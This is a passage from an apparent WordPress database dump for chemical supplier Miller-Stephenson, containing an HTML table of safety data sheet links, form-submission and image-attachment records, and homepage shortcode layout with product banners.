style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8021.pdf">EPON RESIN 8021</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730.pdf">MS-730</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3100MD.pdf">MS-31XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Y0717A.pdf">Y0717A</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VPF.pdf">VACUUM PUMP FLUID</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8132.pdf">EPON RESIN 8132</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730.pdf">MS-730M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3200MD.pdf">MS-32XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT960.pdf">Vydax NRT 960</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VPFXP.pdf">VACUUM PUMP FLUID XP</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8280.pdf">EPON RESIN 8280</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730L.pdf">MS-730L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XP35.pdf">X-P35</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA5.pdf">RA/IPA-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHT500AF.pdf">XHT-500AF</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8281.pdf">EPON RESIN 8281</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805B.pdf">H0805B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA15.pdf">RA/IPA-15</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHToils.pdf">XHT-OILS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58005.pdf">EPON RESIN 58005</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H1112B.pdf">H1112B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA.pdf">DryFilm RA/IPA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTAC.pdf">XHT-AC, ACX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58034.pdf">EPON RESIN 58034</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/745.pdf">MS-745</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSDG.pdf">Vertrel SDG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RA.pdf">DryFilm RA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/XHT-BD-series.pdf">XHT BD, BDZ, BDX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1510.pdf">EPONEX 1510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSFR.pdf">Vertrel SFR</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-RED-16.pdf">MS-143TE Red</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTS.pdf">XHT-S, SX, SZ</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/WD510.pdf">EPI-REZ WD-510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750M</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/485G-16.pdf">MS-48G RFI Nickel</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-1.0-16.pdf">MS-143TE-1.0</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL2E.pdf">GPL 2E SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3522W60.pdf">EPI-REZ 3522-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.0-16.pdf">MS-143TE-2.0</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/fluoroguard.pdf">PCA,PRO,SG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5003W55.pdf">EPI-REZ 5003-W-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.5-16.pdf">MS-143TE-2.5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5520W60.pdf">EPI-REZ 5520-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755L.pdf">MS-755L</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-5-16.pdf">MS-143TE-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5522WY55.pdf">EPI-REZ 5522-WY-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-10-16.pdf">MS-143TE-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3015.pdf">EPIKURE 3015</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-82-16.pdf">ReleaSys 82</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3046.pdf">EPIKURE 3046</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/765.pdf">MS-765</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-85-16.pdf">ReleaSys 85</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3055.pdf">EPIKURE 3055</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-88-16.pdf">ReleaSys 88</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3115.pdf">EPIKURE 3115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-89-16.pdf">ReleaSys 89</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3125.pdf">EPIKURE 3125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8200-16.pdf">ReleaSys 8200</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3140.pdf">EPIKURE 3140</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8500-16.pdf">ReleaSys 8500</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3155.pdf">EPIKURE 3155</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8800-16.pdf">ReleaSys 8800</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3164.pdf">EPIKURE 3164</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8900-16.pdf">ReleaSys 8900</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3223.pdf">EPIKURE 3223</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122AVL-16.pdf">MS-122AVL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3234.pdf">EPIKURE 3234</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122SEL-16.pdf">MS-122SEL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3245.pdf">EPIKURE 3245</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/110XN-16.pdf">MS-110XN</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-BLUE-16.pdf">MS-143TE Blue</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3253.pdf">EPIKURE 3253</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120X.pdf">MS-120X</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3270.pdf">EPIKURE 3270</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120XXP.pdf">MS-120X-XP</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3271.pdf">EPIKURE 3271</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805A.pdf">H0805A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3274.pdf">EPIKURE 3274</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/J0912A.pdf">J0912A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3282.pdf">EPIKURE 3282</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K0725A.pdf">K0725A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3290.pdf">EPIKURE 3290</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1016A.pdf">K1016A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3295.pdf">EPIKURE 3295</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/530N-17.pdf">MS-530N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/W.pdf">CURING AGENT W</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/532N-16.pdf">MS-532N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K54.pdf">ANCAMINE K54</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/538N-17.pdf">MS-538N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K61B.pdf">ANCAMINE K61B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/539N-16.pdf">MS-539N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BDMA.pdf">BDMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/550N-16.pdf">MS-550N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BF3400.PDF">BF3-400</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/552N-16.pdf">MS-552N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/DEAPA.pdf">DEAPA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/580N-16.pdf">MS-580N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NMA.pdf">NMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/582N-16.pdf">MS-582N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V115.pdf">VERSAMID 115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/747-16.pdf">MS-747</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V125.pdf">VERSAMID 125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V140.pdf">VERSAMID 140</a></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2017-01-10 20:23:31', '2017-01-10 20:23:31', '', 1842, 'https://www.miller-stephenson.com/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3435, 0, '2017-01-11 05:39:48', '2017-01-11 05:39:48', '', '', '', 'publish', 'closed', 'closed', '', '3435', '', '', '2017-01-11 05:39:48', '2017-01-11 05:39:48', '', 0, 'https://www.miller-stephenson.com/nf_sub/3435/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3437, 0, '2017-01-11 13:29:05', '2017-01-11 13:29:05', '', '', '', 'publish', 'closed', 'closed', '', '3437', '', '', '2017-01-11 13:29:06', '2017-01-11 13:29:06', '', 0, 'https://www.miller-stephenson.com/nf_sub/3437/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3438, 0, '2017-01-11 15:32:13', '2017-01-11 15:32:13', '', '', '', 'publish', 'closed', 'closed', '', '3438', '', '', '2017-01-11 15:32:13', '2017-01-11 15:32:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/3438/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3439, 0, '2017-01-11 17:43:12', '2017-01-11 17:43:12', '', '', '', 'publish', 'closed', 'closed', '', '3439', '', '', '2017-01-11 17:43:12', '2017-01-11 17:43:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/3439/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3440, 0, '2017-01-11 18:40:34', '2017-01-11 18:40:34', '', '', '', 'publish', 'closed', 'closed', '', '3440', '', '', '2017-01-11 18:40:34', '2017-01-11 18:40:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/3440/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3441, 0, '2017-01-11 19:21:53', '2017-01-11 19:21:53', '', '', '', 'publish', 'closed', 'closed', '', '3441', '', '', '2017-01-11 19:21:53', '2017-01-11 19:21:53', '', 0, 'https://www.miller-stephenson.com/nf_sub/3441/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3442, 0, '2017-01-11 21:25:14', '2017-01-11 21:25:14', '', '', '', 'publish', 'closed', 'closed', '', '3442', '', '', '2017-01-11 21:25:15', '2017-01-11 21:25:15', '', 0, 'https://www.miller-stephenson.com/nf_sub/3442/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3443, 0, '2017-01-12 12:29:18', '2017-01-12 12:29:18', '', '', '', 'publish', 'closed', 'closed', '', '3443', '', '', '2017-01-12 12:29:19', '2017-01-12 12:29:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/3443/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3444, 0, '2017-01-12 13:34:43', '2017-01-12 13:34:43', '', '', '', 'publish', 'closed', 'closed', '', '3444', '', '', '2017-01-12 13:34:44', '2017-01-12 13:34:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/3444/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3445, 0, '2017-01-12 14:20:27', '2017-01-12 14:20:27', '', '', '', 'publish', 'closed', 'closed', '', '3445', '', '', '2017-01-12 14:20:27', '2017-01-12 14:20:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/3445/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3448, 3, '2017-01-12 14:42:02', '2017-01-12 14:42:02', '', 'MS-485G', '', 'inherit', 'closed', 'closed', '', 'ms-485g', '', '', '2017-01-12 14:42:13', '2017-01-12 14:42:13', '', 1722, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-485G.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3449, 3, '2017-01-12 14:44:22', '2017-01-12 14:44:22', '', 'MS-487G', '', 'inherit', 'closed', 'closed', '', 'ms-487g-2', '', '', '2017-01-12 14:44:33', '2017-01-12 14:44:33', '', 1722, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-487G.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3450, 3, '2017-01-12 14:46:09', '2017-01-12 14:46:09', '', 'Nickel Conductive Coatings', 'RFI / EMI Nickel Conductive Coating ', 'inherit', 'closed', 'closed', '', 'shutterstock_484572385', '', '', '2017-01-12 14:46:47', '2017-01-12 14:46:47', '', 1722, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/shutterstock_484572385.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3451, 2, '2017-01-12 19:23:58', '2017-01-12 19:23:58', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Large Inventory</h3>\r\nWith four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col 